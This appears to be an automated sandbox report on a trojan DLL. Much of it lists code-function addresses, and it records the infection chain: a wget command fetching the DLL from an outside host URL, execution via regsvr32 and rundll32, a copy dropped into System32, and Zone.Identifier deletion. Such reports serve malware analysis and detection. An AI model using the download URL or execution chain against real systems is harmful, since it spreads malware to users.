                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180013C28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180014C2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001BD1C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180015D28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180013D48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001DD50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180034D6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180019D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180016D88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002CE14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180013E60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180038E9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001EEB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180015F14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180013F68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180016F74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180031F98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018003DFDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012B0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E409C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E7368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E3320
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014EA38C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D7BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014DBA00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E25B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E5C94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D4F80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E7E54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D7E74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014EB95C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014EE964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014EF108
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D5914
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D1910
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014EC9D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D39D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F21FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F4180
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E11AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F31A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F71A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F087C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014DB078
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F3078
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E7870
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D383C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014EA83C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014DF038
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D48D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014DF8D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E70FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F48F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D409C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F6098
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E80A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014DA368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014DE37C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014EFB7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D4B78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F1B0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D433C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014ECBC4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F2BD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F4BAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E23B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D3248
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014DE254
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D1208
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014EA228
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E6238
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D9230
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014EC230
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014DAACC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F02E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014EAA8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E828C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D1A88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D229C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E529C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F2AA4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E42A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014DAD48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F3D54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D8564
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F6D60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F0D7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F5D7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014DDD78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E9D18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E4D10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014EF528
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F1528
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D7D3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014DE538
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F45C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D25DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014DFDD4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D2DE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E1DA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F4DB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014DCDB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D6C40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D8458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F446C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E6C60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E7C04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F1418
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014EF414
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F6410
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E3C2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D3C20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E54C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D1CD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D248C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014DFC84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E775C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E3F50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F4F70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F1F04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014DB714
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014DA73C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E47EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F17E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D27E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E8788
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014DBF84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014EF794
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D2FA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014DF7A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014EEFA4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014EAFB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D4E58
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E0E04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E561C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014E6628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014EB6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014DFEDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D2EE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014D5EE4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014DDEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F6688
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F3698
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014F0EAB
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014EA6B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001EA80000000
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_00000292F30A0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00440000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004994E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A409C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A5C94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B5D7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A25B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00497E74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049BA00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A6628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004AB6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049FEDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00495EE4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B6688
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B4F70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A3320
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004AA38C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00497BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00496C40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00498458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B446C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A6C60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049B078
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B3078
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B087C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A7870
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00499474
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A7C04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B1418
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B6410
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004AF414
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A3C2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00493C20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049F038
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049383C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004AA83C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A54C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00491CD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049F8D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004948D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B48F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A70FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049248C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049FC84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B6098
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049409C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A80A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049AD48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004AB95C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B3D54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B6D60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00498564
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004AE964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049DD78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B0D7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004AF108
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A9D18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00491910
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A4D10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00495914
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004AF528
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B1528
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049E538
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00497D3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B45C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004AC9D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004925DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004939D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049FDD4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00492DE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B21FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B4180
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A1DA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A11AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B71A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B31A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049CDB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B4DB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00493248
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00494E58
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049E254
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A7E54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00491208
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A0E04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A561C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004AA228
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A6238
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00499230
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004AC230
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049AACC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00492EE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B02E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049DEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00491A88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004AAA8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A828C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B3698
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049229C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A529C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B0EAB
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A42A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B2AA4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004AA6B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A775C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A3F50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A7368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00494B78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049E37C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004AFB7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B1B0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B1F04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049B714
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049433C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049A73C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004ACBC4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B2BD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A47EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004927E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B17E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A8788
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049BF84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004AF794
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00492FA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049F7A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004B4BAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004AEFA4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004AAFB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A23B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 0000000180029B0C appears 44 times
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\wget.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/" > cmdline.out 2>&1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/"
                      Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\download\NjszMzh0ar.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,AOBplENEwxGsLJOHWaHDTizor
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\QKXGFEEVVr\VycaGa.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,BSUOlvQdFaMbSsYDjgkGG
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,DllRegisterServer
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\download\NjszMzh0ar.dll
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,AOBplENEwxGsLJOHWaHDTizor
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,BSUOlvQdFaMbSsYDjgkGG
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,DllRegisterServer
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\QKXGFEEVVr\VycaGa.dll"
                      Source: C:\Windows\SysWOW64\wget.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\cmdline.outJump to behavior
                      Source: classification engineClassification label: mal100.troj.evad.win@22/3@1/29
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_014DBA00 CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,FindCloseChangeNotification,
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7048:120:WilError_01
                      Source: C:\Windows\SysWOW64\wget.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\wget.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                      Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                      Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800116CD push rdi; ret
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180011C59 push rdi; ret
                      Source: NjszMzh0ar.dll.2.drStatic PE information: section name: _RDATA
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\download\NjszMzh0ar.dll
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\QKXGFEEVVr\VycaGa.dll (copy)Jump to dropped file
                      Source: C:\Windows\SysWOW64\wget.exeFile created: C:\Users\user\Desktop\download\NjszMzh0ar.dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\QKXGFEEVVr\VycaGa.dll (copy)Jump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\QKXGFEEVVr\VycaGa.dll:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 6.3 %
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180031F98 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180032754 FindFirstFileExW,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180032C30 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180031F98 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049FEDC FindNextFileW,FindFirstFileW,
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: regsvr32.exe, 00000008.00000002.649399940.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.649517478.00000000005DB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471413003.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471552256.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471580346.00000000005B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
